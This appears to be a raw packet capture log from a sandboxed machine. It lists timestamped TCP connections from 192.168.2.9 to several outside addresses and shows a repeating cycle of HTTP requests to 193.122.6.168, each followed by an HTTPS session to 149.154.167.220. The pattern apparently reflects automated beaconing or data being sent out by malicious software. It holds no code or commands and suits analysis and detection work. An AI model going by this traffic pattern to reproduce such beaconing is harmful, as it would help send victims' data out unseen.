                                                                                                        Jan 10, 2025 19:56:22.017843962 CET44349974142.250.185.161192.168.2.9
                                                                                                        Jan 10, 2025 19:56:22.017920017 CET49974443192.168.2.9142.250.185.161
                                                                                                        Jan 10, 2025 19:56:22.017942905 CET44349974142.250.185.161192.168.2.9
                                                                                                        Jan 10, 2025 19:56:22.017986059 CET49974443192.168.2.9142.250.185.161
                                                                                                        Jan 10, 2025 19:56:22.023529053 CET44349974142.250.185.161192.168.2.9
                                                                                                        Jan 10, 2025 19:56:22.023581982 CET49974443192.168.2.9142.250.185.161
                                                                                                        Jan 10, 2025 19:56:22.053337097 CET44349974142.250.185.161192.168.2.9
                                                                                                        Jan 10, 2025 19:56:22.053417921 CET49974443192.168.2.9142.250.185.161
                                                                                                        Jan 10, 2025 19:56:22.053431988 CET44349974142.250.185.161192.168.2.9
                                                                                                        Jan 10, 2025 19:56:22.053464890 CET44349974142.250.185.161192.168.2.9
                                                                                                        Jan 10, 2025 19:56:22.053478956 CET49974443192.168.2.9142.250.185.161
                                                                                                        Jan 10, 2025 19:56:22.053488970 CET44349974142.250.185.161192.168.2.9
                                                                                                        Jan 10, 2025 19:56:22.053509951 CET49974443192.168.2.9142.250.185.161
                                                                                                        Jan 10, 2025 19:56:22.053550959 CET49974443192.168.2.9142.250.185.161
                                                                                                        Jan 10, 2025 19:56:22.053555012 CET44349974142.250.185.161192.168.2.9
                                                                                                        Jan 10, 2025 19:56:22.053594112 CET49974443192.168.2.9142.250.185.161
                                                                                                        Jan 10, 2025 19:56:22.054193020 CET44349974142.250.185.161192.168.2.9
                                                                                                        Jan 10, 2025 19:56:22.054238081 CET49974443192.168.2.9142.250.185.161
                                                                                                        Jan 10, 2025 19:56:22.054244995 CET44349974142.250.185.161192.168.2.9
                                                                                                        Jan 10, 2025 19:56:22.054275036 CET44349974142.250.185.161192.168.2.9
                                                                                                        Jan 10, 2025 19:56:22.054294109 CET49974443192.168.2.9142.250.185.161
                                                                                                        Jan 10, 2025 19:56:22.054300070 CET44349974142.250.185.161192.168.2.9
                                                                                                        Jan 10, 2025 19:56:22.054317951 CET49974443192.168.2.9142.250.185.161
                                                                                                        Jan 10, 2025 19:56:22.054344893 CET49974443192.168.2.9142.250.185.161
                                                                                                        Jan 10, 2025 19:56:22.054348946 CET44349974142.250.185.161192.168.2.9
                                                                                                        Jan 10, 2025 19:56:22.054406881 CET49974443192.168.2.9142.250.185.161
                                                                                                        Jan 10, 2025 19:56:22.054855108 CET44349974142.250.185.161192.168.2.9
                                                                                                        Jan 10, 2025 19:56:22.054903030 CET49974443192.168.2.9142.250.185.161
                                                                                                        Jan 10, 2025 19:56:22.055893898 CET44349974142.250.185.161192.168.2.9
                                                                                                        Jan 10, 2025 19:56:22.055988073 CET49974443192.168.2.9142.250.185.161
                                                                                                        Jan 10, 2025 19:56:22.059535980 CET44349974142.250.185.161192.168.2.9
                                                                                                        Jan 10, 2025 19:56:22.059592962 CET49974443192.168.2.9142.250.185.161
                                                                                                        Jan 10, 2025 19:56:22.059609890 CET44349974142.250.185.161192.168.2.9
                                                                                                        Jan 10, 2025 19:56:22.059674978 CET49974443192.168.2.9142.250.185.161
                                                                                                        Jan 10, 2025 19:56:22.064466953 CET44349974142.250.185.161192.168.2.9
                                                                                                        Jan 10, 2025 19:56:22.064517975 CET49974443192.168.2.9142.250.185.161
                                                                                                        Jan 10, 2025 19:56:22.064526081 CET44349974142.250.185.161192.168.2.9
                                                                                                        Jan 10, 2025 19:56:22.064574003 CET49974443192.168.2.9142.250.185.161
                                                                                                        Jan 10, 2025 19:56:22.069444895 CET44349974142.250.185.161192.168.2.9
                                                                                                        Jan 10, 2025 19:56:22.069519997 CET49974443192.168.2.9142.250.185.161
                                                                                                        Jan 10, 2025 19:56:22.069528103 CET44349974142.250.185.161192.168.2.9
                                                                                                        Jan 10, 2025 19:56:22.069575071 CET49974443192.168.2.9142.250.185.161
                                                                                                        Jan 10, 2025 19:56:22.074930906 CET44349974142.250.185.161192.168.2.9
                                                                                                        Jan 10, 2025 19:56:22.074985027 CET49974443192.168.2.9142.250.185.161
                                                                                                        Jan 10, 2025 19:56:22.075032949 CET44349974142.250.185.161192.168.2.9
                                                                                                        Jan 10, 2025 19:56:22.075088024 CET49974443192.168.2.9142.250.185.161
                                                                                                        Jan 10, 2025 19:56:22.082072020 CET44349974142.250.185.161192.168.2.9
                                                                                                        Jan 10, 2025 19:56:22.083323002 CET44349974142.250.185.161192.168.2.9
                                                                                                        Jan 10, 2025 19:56:22.083355904 CET44349974142.250.185.161192.168.2.9
                                                                                                        Jan 10, 2025 19:56:22.083378077 CET49974443192.168.2.9142.250.185.161
                                                                                                        Jan 10, 2025 19:56:22.083389997 CET44349974142.250.185.161192.168.2.9
                                                                                                        Jan 10, 2025 19:56:22.083404064 CET49974443192.168.2.9142.250.185.161
                                                                                                        Jan 10, 2025 19:56:22.083437920 CET49974443192.168.2.9142.250.185.161
                                                                                                        Jan 10, 2025 19:56:22.088728905 CET44349974142.250.185.161192.168.2.9
                                                                                                        Jan 10, 2025 19:56:22.092727900 CET44349974142.250.185.161192.168.2.9
                                                                                                        Jan 10, 2025 19:56:22.092782021 CET44349974142.250.185.161192.168.2.9
                                                                                                        Jan 10, 2025 19:56:22.092824936 CET49974443192.168.2.9142.250.185.161
                                                                                                        Jan 10, 2025 19:56:22.092837095 CET44349974142.250.185.161192.168.2.9
                                                                                                        Jan 10, 2025 19:56:22.092886925 CET49974443192.168.2.9142.250.185.161
                                                                                                        Jan 10, 2025 19:56:22.092886925 CET49974443192.168.2.9142.250.185.161
                                                                                                        Jan 10, 2025 19:56:22.097116947 CET44349974142.250.185.161192.168.2.9
                                                                                                        Jan 10, 2025 19:56:22.100106955 CET49974443192.168.2.9142.250.185.161
                                                                                                        Jan 10, 2025 19:56:22.100119114 CET44349974142.250.185.161192.168.2.9
                                                                                                        Jan 10, 2025 19:56:22.100174904 CET49974443192.168.2.9142.250.185.161
                                                                                                        Jan 10, 2025 19:56:22.101510048 CET44349974142.250.185.161192.168.2.9
                                                                                                        Jan 10, 2025 19:56:22.101574898 CET49974443192.168.2.9142.250.185.161
                                                                                                        Jan 10, 2025 19:56:22.101582050 CET44349974142.250.185.161192.168.2.9
                                                                                                        Jan 10, 2025 19:56:22.101629972 CET49974443192.168.2.9142.250.185.161
                                                                                                        Jan 10, 2025 19:56:22.105725050 CET44349974142.250.185.161192.168.2.9
                                                                                                        Jan 10, 2025 19:56:22.105791092 CET49974443192.168.2.9142.250.185.161
                                                                                                        Jan 10, 2025 19:56:22.105798960 CET44349974142.250.185.161192.168.2.9
                                                                                                        Jan 10, 2025 19:56:22.105863094 CET49974443192.168.2.9142.250.185.161
                                                                                                        Jan 10, 2025 19:56:22.105869055 CET44349974142.250.185.161192.168.2.9
                                                                                                        Jan 10, 2025 19:56:22.105920076 CET49974443192.168.2.9142.250.185.161
                                                                                                        Jan 10, 2025 19:56:22.105926991 CET44349974142.250.185.161192.168.2.9
                                                                                                        Jan 10, 2025 19:56:22.105977058 CET49974443192.168.2.9142.250.185.161
                                                                                                        Jan 10, 2025 19:56:22.119956970 CET49974443192.168.2.9142.250.185.161
                                                                                                        Jan 10, 2025 19:56:22.119992971 CET44349974142.250.185.161192.168.2.9
                                                                                                        Jan 10, 2025 19:56:22.645441055 CET4997580192.168.2.9193.122.6.168
                                                                                                        Jan 10, 2025 19:56:22.650893927 CET8049975193.122.6.168192.168.2.9
                                                                                                        Jan 10, 2025 19:56:22.651007891 CET4997580192.168.2.9193.122.6.168
                                                                                                        Jan 10, 2025 19:56:22.651230097 CET4997580192.168.2.9193.122.6.168
                                                                                                        Jan 10, 2025 19:56:22.656048059 CET8049975193.122.6.168192.168.2.9
                                                                                                        Jan 10, 2025 19:56:23.626229048 CET8049975193.122.6.168192.168.2.9
                                                                                                        Jan 10, 2025 19:56:23.630548000 CET4997580192.168.2.9193.122.6.168
                                                                                                        Jan 10, 2025 19:56:23.635545015 CET8049975193.122.6.168192.168.2.9
                                                                                                        Jan 10, 2025 19:56:23.843231916 CET8049975193.122.6.168192.168.2.9
                                                                                                        Jan 10, 2025 19:56:23.891366959 CET4997580192.168.2.9193.122.6.168
                                                                                                        Jan 10, 2025 19:56:24.350162983 CET49977443192.168.2.9104.21.96.1
                                                                                                        Jan 10, 2025 19:56:24.350204945 CET44349977104.21.96.1192.168.2.9
                                                                                                        Jan 10, 2025 19:56:24.350405931 CET49977443192.168.2.9104.21.96.1
                                                                                                        Jan 10, 2025 19:56:24.383943081 CET49977443192.168.2.9104.21.96.1
                                                                                                        Jan 10, 2025 19:56:24.383968115 CET44349977104.21.96.1192.168.2.9
                                                                                                        Jan 10, 2025 19:56:24.849666119 CET44349977104.21.96.1192.168.2.9
                                                                                                        Jan 10, 2025 19:56:24.849780083 CET49977443192.168.2.9104.21.96.1
                                                                                                        Jan 10, 2025 19:56:24.852977991 CET49977443192.168.2.9104.21.96.1
                                                                                                        Jan 10, 2025 19:56:24.852986097 CET44349977104.21.96.1192.168.2.9
                                                                                                        Jan 10, 2025 19:56:24.853318930 CET44349977104.21.96.1192.168.2.9
                                                                                                        Jan 10, 2025 19:56:24.857080936 CET49977443192.168.2.9104.21.96.1
                                                                                                        Jan 10, 2025 19:56:24.899323940 CET44349977104.21.96.1192.168.2.9
                                                                                                        Jan 10, 2025 19:56:25.008797884 CET44349977104.21.96.1192.168.2.9
                                                                                                        Jan 10, 2025 19:56:25.008888006 CET44349977104.21.96.1192.168.2.9
                                                                                                        Jan 10, 2025 19:56:25.008987904 CET49977443192.168.2.9104.21.96.1
                                                                                                        Jan 10, 2025 19:56:25.014329910 CET49977443192.168.2.9104.21.96.1
                                                                                                        Jan 10, 2025 19:56:30.658612967 CET4997580192.168.2.9193.122.6.168
                                                                                                        Jan 10, 2025 19:56:30.663650990 CET8049975193.122.6.168192.168.2.9
                                                                                                        Jan 10, 2025 19:56:30.850446939 CET8049975193.122.6.168192.168.2.9
                                                                                                        Jan 10, 2025 19:56:30.862185955 CET49978443192.168.2.9149.154.167.220
                                                                                                        Jan 10, 2025 19:56:30.862243891 CET44349978149.154.167.220192.168.2.9
                                                                                                        Jan 10, 2025 19:56:30.862309933 CET49978443192.168.2.9149.154.167.220
                                                                                                        Jan 10, 2025 19:56:30.862843037 CET49978443192.168.2.9149.154.167.220
                                                                                                        Jan 10, 2025 19:56:30.862859011 CET44349978149.154.167.220192.168.2.9
                                                                                                        Jan 10, 2025 19:56:30.891376972 CET4997580192.168.2.9193.122.6.168
                                                                                                        Jan 10, 2025 19:56:31.669264078 CET44349978149.154.167.220192.168.2.9
                                                                                                        Jan 10, 2025 19:56:31.669349909 CET49978443192.168.2.9149.154.167.220
                                                                                                        Jan 10, 2025 19:56:31.696732998 CET49978443192.168.2.9149.154.167.220
                                                                                                        Jan 10, 2025 19:56:31.696768045 CET44349978149.154.167.220192.168.2.9
                                                                                                        Jan 10, 2025 19:56:31.697082996 CET44349978149.154.167.220192.168.2.9
                                                                                                        Jan 10, 2025 19:56:31.750799894 CET49978443192.168.2.9149.154.167.220
                                                                                                        Jan 10, 2025 19:56:31.764389992 CET49978443192.168.2.9149.154.167.220
                                                                                                        Jan 10, 2025 19:56:31.807384014 CET44349978149.154.167.220192.168.2.9
                                                                                                        Jan 10, 2025 19:56:31.807465076 CET49978443192.168.2.9149.154.167.220
                                                                                                        Jan 10, 2025 19:56:31.807499886 CET44349978149.154.167.220192.168.2.9
                                                                                                        Jan 10, 2025 19:56:32.177815914 CET44349978149.154.167.220192.168.2.9
                                                                                                        Jan 10, 2025 19:56:32.177901030 CET44349978149.154.167.220192.168.2.9
                                                                                                        Jan 10, 2025 19:56:32.177994013 CET49978443192.168.2.9149.154.167.220
                                                                                                        Jan 10, 2025 19:56:32.178400040 CET49978443192.168.2.9149.154.167.220
                                                                                                        Jan 10, 2025 19:56:32.331492901 CET4997580192.168.2.9193.122.6.168
                                                                                                        Jan 10, 2025 19:56:32.332792997 CET4997980192.168.2.9193.122.6.168
                                                                                                        Jan 10, 2025 19:56:32.336500883 CET8049975193.122.6.168192.168.2.9
                                                                                                        Jan 10, 2025 19:56:32.336565018 CET4997580192.168.2.9193.122.6.168
                                                                                                        Jan 10, 2025 19:56:32.337676048 CET8049979193.122.6.168192.168.2.9
                                                                                                        Jan 10, 2025 19:56:32.337749004 CET4997980192.168.2.9193.122.6.168
                                                                                                        Jan 10, 2025 19:56:32.337862015 CET4997980192.168.2.9193.122.6.168
                                                                                                        Jan 10, 2025 19:56:32.342677116 CET8049979193.122.6.168192.168.2.9
                                                                                                        Jan 10, 2025 19:56:32.987696886 CET8049979193.122.6.168192.168.2.9
                                                                                                        Jan 10, 2025 19:56:32.991425037 CET49980443192.168.2.9149.154.167.220
                                                                                                        Jan 10, 2025 19:56:32.991475105 CET44349980149.154.167.220192.168.2.9
                                                                                                        Jan 10, 2025 19:56:32.991544008 CET49980443192.168.2.9149.154.167.220
                                                                                                        Jan 10, 2025 19:56:32.992131948 CET49980443192.168.2.9149.154.167.220
                                                                                                        Jan 10, 2025 19:56:32.992146969 CET44349980149.154.167.220192.168.2.9
                                                                                                        Jan 10, 2025 19:56:33.032027006 CET4997980192.168.2.9193.122.6.168
                                                                                                        Jan 10, 2025 19:56:33.617018938 CET44349980149.154.167.220192.168.2.9
                                                                                                        Jan 10, 2025 19:56:33.618782997 CET49980443192.168.2.9149.154.167.220
                                                                                                        Jan 10, 2025 19:56:33.618796110 CET44349980149.154.167.220192.168.2.9
                                                                                                        Jan 10, 2025 19:56:33.618860960 CET49980443192.168.2.9149.154.167.220
                                                                                                        Jan 10, 2025 19:56:33.618870974 CET44349980149.154.167.220192.168.2.9
                                                                                                        Jan 10, 2025 19:56:33.861639977 CET44349980149.154.167.220192.168.2.9
                                                                                                        Jan 10, 2025 19:56:33.861718893 CET44349980149.154.167.220192.168.2.9
                                                                                                        Jan 10, 2025 19:56:33.861762047 CET49980443192.168.2.9149.154.167.220
                                                                                                        Jan 10, 2025 19:56:33.862169981 CET49980443192.168.2.9149.154.167.220
                                                                                                        Jan 10, 2025 19:56:33.866528034 CET4998180192.168.2.9193.122.6.168
                                                                                                        Jan 10, 2025 19:56:33.871299982 CET8049981193.122.6.168192.168.2.9
                                                                                                        Jan 10, 2025 19:56:33.871454954 CET4998180192.168.2.9193.122.6.168
                                                                                                        Jan 10, 2025 19:56:33.871454954 CET4998180192.168.2.9193.122.6.168
                                                                                                        Jan 10, 2025 19:56:33.876312017 CET8049981193.122.6.168192.168.2.9
                                                                                                        Jan 10, 2025 19:56:34.519035101 CET8049981193.122.6.168192.168.2.9
                                                                                                        Jan 10, 2025 19:56:34.539136887 CET49982443192.168.2.9149.154.167.220
                                                                                                        Jan 10, 2025 19:56:34.539206982 CET44349982149.154.167.220192.168.2.9
                                                                                                        Jan 10, 2025 19:56:34.539283037 CET49982443192.168.2.9149.154.167.220
                                                                                                        Jan 10, 2025 19:56:34.539657116 CET49982443192.168.2.9149.154.167.220
                                                                                                        Jan 10, 2025 19:56:34.539675951 CET44349982149.154.167.220192.168.2.9
                                                                                                        Jan 10, 2025 19:56:34.563263893 CET4998180192.168.2.9193.122.6.168
                                                                                                        Jan 10, 2025 19:56:35.328644991 CET44349982149.154.167.220192.168.2.9
                                                                                                        Jan 10, 2025 19:56:35.330288887 CET49982443192.168.2.9149.154.167.220
                                                                                                        Jan 10, 2025 19:56:35.330301046 CET44349982149.154.167.220192.168.2.9
                                                                                                        Jan 10, 2025 19:56:35.330357075 CET49982443192.168.2.9149.154.167.220
                                                                                                        Jan 10, 2025 19:56:35.330367088 CET44349982149.154.167.220192.168.2.9
                                                                                                        Jan 10, 2025 19:56:35.693257093 CET44349982149.154.167.220192.168.2.9
                                                                                                        Jan 10, 2025 19:56:35.693355083 CET44349982149.154.167.220192.168.2.9
                                                                                                        Jan 10, 2025 19:56:35.693542004 CET49982443192.168.2.9149.154.167.220
                                                                                                        Jan 10, 2025 19:56:35.693809032 CET49982443192.168.2.9149.154.167.220
                                                                                                        Jan 10, 2025 19:56:35.697323084 CET4998180192.168.2.9193.122.6.168
                                                                                                        Jan 10, 2025 19:56:35.698364019 CET4998380192.168.2.9193.122.6.168
                                                                                                        Jan 10, 2025 19:56:35.702306032 CET8049981193.122.6.168192.168.2.9
                                                                                                        Jan 10, 2025 19:56:35.702446938 CET4998180192.168.2.9193.122.6.168
                                                                                                        Jan 10, 2025 19:56:35.703190088 CET8049983193.122.6.168192.168.2.9
                                                                                                        Jan 10, 2025 19:56:35.703332901 CET4998380192.168.2.9193.122.6.168
                                                                                                        Jan 10, 2025 19:56:35.703413010 CET4998380192.168.2.9193.122.6.168
                                                                                                        Jan 10, 2025 19:56:35.708148956 CET8049983193.122.6.168192.168.2.9
                                                                                                        Jan 10, 2025 19:56:36.331829071 CET8049983193.122.6.168192.168.2.9
                                                                                                        Jan 10, 2025 19:56:36.332884073 CET49984443192.168.2.9149.154.167.220
                                                                                                        Jan 10, 2025 19:56:36.332928896 CET44349984149.154.167.220192.168.2.9
                                                                                                        Jan 10, 2025 19:56:36.333003044 CET49984443192.168.2.9149.154.167.220
                                                                                                        Jan 10, 2025 19:56:36.333270073 CET49984443192.168.2.9149.154.167.220
                                                                                                        Jan 10, 2025 19:56:36.333280087 CET44349984149.154.167.220192.168.2.9
                                                                                                        Jan 10, 2025 19:56:36.375804901 CET4998380192.168.2.9193.122.6.168
                                                                                                        Jan 10, 2025 19:56:36.962656021 CET44349984149.154.167.220192.168.2.9
                                                                                                        Jan 10, 2025 19:56:36.964210033 CET49984443192.168.2.9149.154.167.220
                                                                                                        Jan 10, 2025 19:56:36.964220047 CET44349984149.154.167.220192.168.2.9
                                                                                                        Jan 10, 2025 19:56:36.964265108 CET49984443192.168.2.9149.154.167.220
                                                                                                        Jan 10, 2025 19:56:36.964273930 CET44349984149.154.167.220192.168.2.9
                                                                                                        Jan 10, 2025 19:56:37.490655899 CET44349984149.154.167.220192.168.2.9
                                                                                                        Jan 10, 2025 19:56:37.490865946 CET44349984149.154.167.220192.168.2.9
                                                                                                        Jan 10, 2025 19:56:37.490932941 CET49984443192.168.2.9149.154.167.220
                                                                                                        Jan 10, 2025 19:56:37.496067047 CET49984443192.168.2.9149.154.167.220
                                                                                                        Jan 10, 2025 19:56:37.666853905 CET4998380192.168.2.9193.122.6.168
                                                                                                        Jan 10, 2025 19:56:37.672835112 CET8049983193.122.6.168192.168.2.9
                                                                                                        Jan 10, 2025 19:56:37.672903061 CET4998380192.168.2.9193.122.6.168
                                                                                                        Jan 10, 2025 19:56:37.681952953 CET4998580192.168.2.9193.122.6.168
                                                                                                        Jan 10, 2025 19:56:37.686707973 CET8049985193.122.6.168192.168.2.9
                                                                                                        Jan 10, 2025 19:56:37.686770916 CET4998580192.168.2.9193.122.6.168
                                                                                                        Jan 10, 2025 19:56:37.695169926 CET4998580192.168.2.9193.122.6.168
                                                                                                        Jan 10, 2025 19:56:37.700422049 CET8049985193.122.6.168192.168.2.9
                                                                                                        Jan 10, 2025 19:56:38.349946022 CET8049985193.122.6.168192.168.2.9
                                                                                                        Jan 10, 2025 19:56:38.351337910 CET49986443192.168.2.9149.154.167.220
                                                                                                        Jan 10, 2025 19:56:38.351398945 CET44349986149.154.167.220192.168.2.9
                                                                                                        Jan 10, 2025 19:56:38.351491928 CET49986443192.168.2.9149.154.167.220
                                                                                                        Jan 10, 2025 19:56:38.351782084 CET49986443192.168.2.9149.154.167.220
                                                                                                        Jan 10, 2025 19:56:38.351804972 CET44349986149.154.167.220192.168.2.9
                                                                                                        Jan 10, 2025 19:56:38.391563892 CET4998580192.168.2.9193.122.6.168
                                                                                                        Jan 10, 2025 19:56:39.027198076 CET44349986149.154.167.220192.168.2.9
                                                                                                        Jan 10, 2025 19:56:39.028825998 CET49986443192.168.2.9149.154.167.220
                                                                                                        Jan 10, 2025 19:56:39.028855085 CET44349986149.154.167.220192.168.2.9
                                                                                                        Jan 10, 2025 19:56:39.028912067 CET49986443192.168.2.9149.154.167.220
                                                                                                        Jan 10, 2025 19:56:39.028920889 CET44349986149.154.167.220192.168.2.9
                                                                                                        Jan 10, 2025 19:56:39.489701033 CET44349986149.154.167.220192.168.2.9
                                                                                                        Jan 10, 2025 19:56:39.489794970 CET44349986149.154.167.220192.168.2.9
                                                                                                        Jan 10, 2025 19:56:39.489944935 CET49986443192.168.2.9149.154.167.220
                                                                                                        Jan 10, 2025 19:56:39.490403891 CET49986443192.168.2.9149.154.167.220
                                                                                                        Jan 10, 2025 19:56:39.493539095 CET4998580192.168.2.9193.122.6.168
                                                                                                        Jan 10, 2025 19:56:39.494823933 CET4998780192.168.2.9193.122.6.168
                                                                                                        Jan 10, 2025 19:56:39.498528004 CET8049985193.122.6.168192.168.2.9
                                                                                                        Jan 10, 2025 19:56:39.498625994 CET4998580192.168.2.9193.122.6.168
                                                                                                        Jan 10, 2025 19:56:39.499609947 CET8049987193.122.6.168192.168.2.9
                                                                                                        Jan 10, 2025 19:56:39.499717951 CET4998780192.168.2.9193.122.6.168
                                                                                                        Jan 10, 2025 19:56:39.500016928 CET4998780192.168.2.9193.122.6.168
                                                                                                        Jan 10, 2025 19:56:39.504777908 CET8049987193.122.6.168192.168.2.9
                                                                                                        Jan 10, 2025 19:56:40.242940903 CET8049987193.122.6.168192.168.2.9
                                                                                                        Jan 10, 2025 19:56:40.243882895 CET49988443192.168.2.9149.154.167.220
                                                                                                        Jan 10, 2025 19:56:40.243940115 CET44349988149.154.167.220192.168.2.9
                                                                                                        Jan 10, 2025 19:56:40.244000912 CET49988443192.168.2.9149.154.167.220
                                                                                                        Jan 10, 2025 19:56:40.244227886 CET49988443192.168.2.9149.154.167.220
                                                                                                        Jan 10, 2025 19:56:40.244245052 CET44349988149.154.167.220192.168.2.9
                                                                                                        Jan 10, 2025 19:56:40.297661066 CET4998780192.168.2.9193.122.6.168
                                                                                                        Jan 10, 2025 19:56:40.970637083 CET44349988149.154.167.220192.168.2.9
                                                                                                        Jan 10, 2025 19:56:40.972348928 CET49988443192.168.2.9149.154.167.220
                                                                                                        Jan 10, 2025 19:56:40.972367048 CET44349988149.154.167.220192.168.2.9
                                                                                                        Jan 10, 2025 19:56:40.972414017 CET49988443192.168.2.9149.154.167.220
                                                                                                        Jan 10, 2025 19:56:40.972425938 CET44349988149.154.167.220192.168.2.9
                                                                                                        Jan 10, 2025 19:56:41.456171989 CET44349988149.154.167.220192.168.2.9
                                                                                                        Jan 10, 2025 19:56:41.456255913 CET44349988149.154.167.220192.168.2.9
                                                                                                        Jan 10, 2025 19:56:41.456367016 CET49988443192.168.2.9149.154.167.220
                                                                                                        Jan 10, 2025 19:56:41.459753036 CET49988443192.168.2.9149.154.167.220
                                                                                                        Jan 10, 2025 19:56:41.490838051 CET4998780192.168.2.9193.122.6.168
                                                                                                        Jan 10, 2025 19:56:41.492073059 CET4998980192.168.2.9193.122.6.168
                                                                                                        Jan 10, 2025 19:56:41.495765924 CET8049987193.122.6.168192.168.2.9
                                                                                                        Jan 10, 2025 19:56:41.496840000 CET8049989193.122.6.168192.168.2.9
                                                                                                        Jan 10, 2025 19:56:41.496903896 CET4998780192.168.2.9193.122.6.168
                                                                                                        Jan 10, 2025 19:56:41.496938944 CET4998980192.168.2.9193.122.6.168
                                                                                                        Jan 10, 2025 19:56:41.497037888 CET4998980192.168.2.9193.122.6.168
                                                                                                        Jan 10, 2025 19:56:41.501775026 CET8049989193.122.6.168192.168.2.9
                                                                                                        Jan 10, 2025 19:56:42.144658089 CET8049989193.122.6.168192.168.2.9
                                                                                                        Jan 10, 2025 19:56:42.147182941 CET49990443192.168.2.9149.154.167.220
                                                                                                        Jan 10, 2025 19:56:42.147229910 CET44349990149.154.167.220192.168.2.9
                                                                                                        Jan 10, 2025 19:56:42.147305012 CET49990443192.168.2.9149.154.167.220
                                                                                                        Jan 10, 2025 19:56:42.147562027 CET49990443192.168.2.9149.154.167.220
                                                                                                        Jan 10, 2025 19:56:42.147578001 CET44349990149.154.167.220192.168.2.9
                                                                                                        Jan 10, 2025 19:56:42.188312054 CET4998980192.168.2.9193.122.6.168
                                                                                                        Jan 10, 2025 19:56:42.785598040 CET44349990149.154.167.220192.168.2.9
                                                                                                        Jan 10, 2025 19:56:42.787297964 CET49990443192.168.2.9149.154.167.220
                                                                                                        Jan 10, 2025 19:56:42.787342072 CET44349990149.154.167.220192.168.2.9
                                                                                                        Jan 10, 2025 19:56:42.787411928 CET49990443192.168.2.9149.154.167.220
                                                                                                        Jan 10, 2025 19:56:42.787420988 CET44349990149.154.167.220192.168.2.9
                                                                                                        Jan 10, 2025 19:56:43.133565903 CET44349990149.154.167.220192.168.2.9
                                                                                                        Jan 10, 2025 19:56:43.133707047 CET44349990149.154.167.220192.168.2.9
                                                                                                        Jan 10, 2025 19:56:43.133796930 CET49990443192.168.2.9149.154.167.220
                                                                                                        Jan 10, 2025 19:56:43.134135962 CET49990443192.168.2.9149.154.167.220
                                                                                                        Jan 10, 2025 19:56:43.137113094 CET4998980192.168.2.9193.122.6.168
                                                                                                        Jan 10, 2025 19:56:43.137826920 CET4999180192.168.2.9193.122.6.168
                                                                                                        Jan 10, 2025 19:56:43.142160892 CET8049989193.122.6.168192.168.2.9
                                                                                                        Jan 10, 2025 19:56:43.142297029 CET4998980192.168.2.9193.122.6.168
                                                                                                        Jan 10, 2025 19:56:43.142683983 CET8049991193.122.6.168192.168.2.9
                                                                                                        Jan 10, 2025 19:56:43.142746925 CET4999180192.168.2.9193.122.6.168
                                                                                                        Jan 10, 2025 19:56:43.151722908 CET4999180192.168.2.9193.122.6.168
                                                                                                        Jan 10, 2025 19:56:43.156512976 CET8049991193.122.6.168192.168.2.9
                                                                                                        Jan 10, 2025 19:56:43.768310070 CET8049991193.122.6.168192.168.2.9
                                                                                                        Jan 10, 2025 19:56:43.770095110 CET49992443192.168.2.9149.154.167.220
                                                                                                        Jan 10, 2025 19:56:43.770122051 CET44349992149.154.167.220192.168.2.9
                                                                                                        Jan 10, 2025 19:56:43.770217896 CET49992443192.168.2.9149.154.167.220
                                                                                                        Jan 10, 2025 19:56:43.770487070 CET49992443192.168.2.9149.154.167.220
                                                                                                        Jan 10, 2025 19:56:43.770498991 CET44349992149.154.167.220192.168.2.9
                                                                                                        Jan 10, 2025 19:56:43.813283920 CET4999180192.168.2.9193.122.6.168
                                                                                                        Jan 10, 2025 19:56:44.376713037 CET44349992149.154.167.220192.168.2.9
                                                                                                        Jan 10, 2025 19:56:44.378649950 CET49992443192.168.2.9149.154.167.220
                                                                                                        Jan 10, 2025 19:56:44.378665924 CET44349992149.154.167.220192.168.2.9
                                                                                                        Jan 10, 2025 19:56:44.379286051 CET49992443192.168.2.9149.154.167.220
                                                                                                        Jan 10, 2025 19:56:44.379290104 CET44349992149.154.167.220192.168.2.9
                                                                                                        Jan 10, 2025 19:56:44.714368105 CET44349992149.154.167.220192.168.2.9
                                                                                                        Jan 10, 2025 19:56:44.714454889 CET44349992149.154.167.220192.168.2.9
                                                                                                        Jan 10, 2025 19:56:44.714596033 CET49992443192.168.2.9149.154.167.220
                                                                                                        Jan 10, 2025 19:56:44.715020895 CET49992443192.168.2.9149.154.167.220
                                                                                                        Jan 10, 2025 19:56:44.718235970 CET4999180192.168.2.9193.122.6.168
                                                                                                        Jan 10, 2025 19:56:44.719271898 CET4999380192.168.2.9193.122.6.168
                                                                                                        Jan 10, 2025 19:56:44.723206997 CET8049991193.122.6.168192.168.2.9
                                                                                                        Jan 10, 2025 19:56:44.724091053 CET8049993193.122.6.168192.168.2.9
                                                                                                        Jan 10, 2025 19:56:44.724179029 CET4999180192.168.2.9193.122.6.168
                                                                                                        Jan 10, 2025 19:56:44.724217892 CET4999380192.168.2.9193.122.6.168
                                                                                                        Jan 10, 2025 19:56:44.724353075 CET4999380192.168.2.9193.122.6.168
                                                                                                        Jan 10, 2025 19:56:44.729072094 CET8049993193.122.6.168192.168.2.9
                                                                                                        Jan 10, 2025 19:56:45.430491924 CET8049993193.122.6.168192.168.2.9
                                                                                                        Jan 10, 2025 19:56:45.431767941 CET49994443192.168.2.9149.154.167.220
                                                                                                        Jan 10, 2025 19:56:45.431812048 CET44349994149.154.167.220192.168.2.9
                                                                                                        Jan 10, 2025 19:56:45.431883097 CET49994443192.168.2.9149.154.167.220
                                                                                                        Jan 10, 2025 19:56:45.432164907 CET49994443192.168.2.9149.154.167.220
                                                                                                        Jan 10, 2025 19:56:45.432178020 CET44349994149.154.167.220192.168.2.9
                                                                                                        Jan 10, 2025 19:56:45.485165119 CET4999380192.168.2.9193.122.6.168
                                                                                                        Jan 10, 2025 19:56:46.217468977 CET44349994149.154.167.220192.168.2.9
                                                                                                        Jan 10, 2025 19:56:46.219306946 CET49994443192.168.2.9149.154.167.220
                                                                                                        Jan 10, 2025 19:56:46.219337940 CET44349994149.154.167.220192.168.2.9
                                                                                                        Jan 10, 2025 19:56:46.219430923 CET49994443192.168.2.9149.154.167.220
                                                                                                        Jan 10, 2025 19:56:46.219436884 CET44349994149.154.167.220192.168.2.9
                                                                                                        Jan 10, 2025 19:56:46.560698032 CET44349994149.154.167.220192.168.2.9
                                                                                                        Jan 10, 2025 19:56:46.560794115 CET44349994149.154.167.220192.168.2.9
                                                                                                        Jan 10, 2025 19:56:46.560883999 CET49994443192.168.2.9149.154.167.220
                                                                                                        Jan 10, 2025 19:56:46.561430931 CET49994443192.168.2.9149.154.167.220
                                                                                                        Jan 10, 2025 19:56:46.564709902 CET4999380192.168.2.9193.122.6.168
                                                                                                        Jan 10, 2025 19:56:46.565738916 CET4999580192.168.2.9193.122.6.168
                                                                                                        Jan 10, 2025 19:56:46.569911003 CET8049993193.122.6.168192.168.2.9
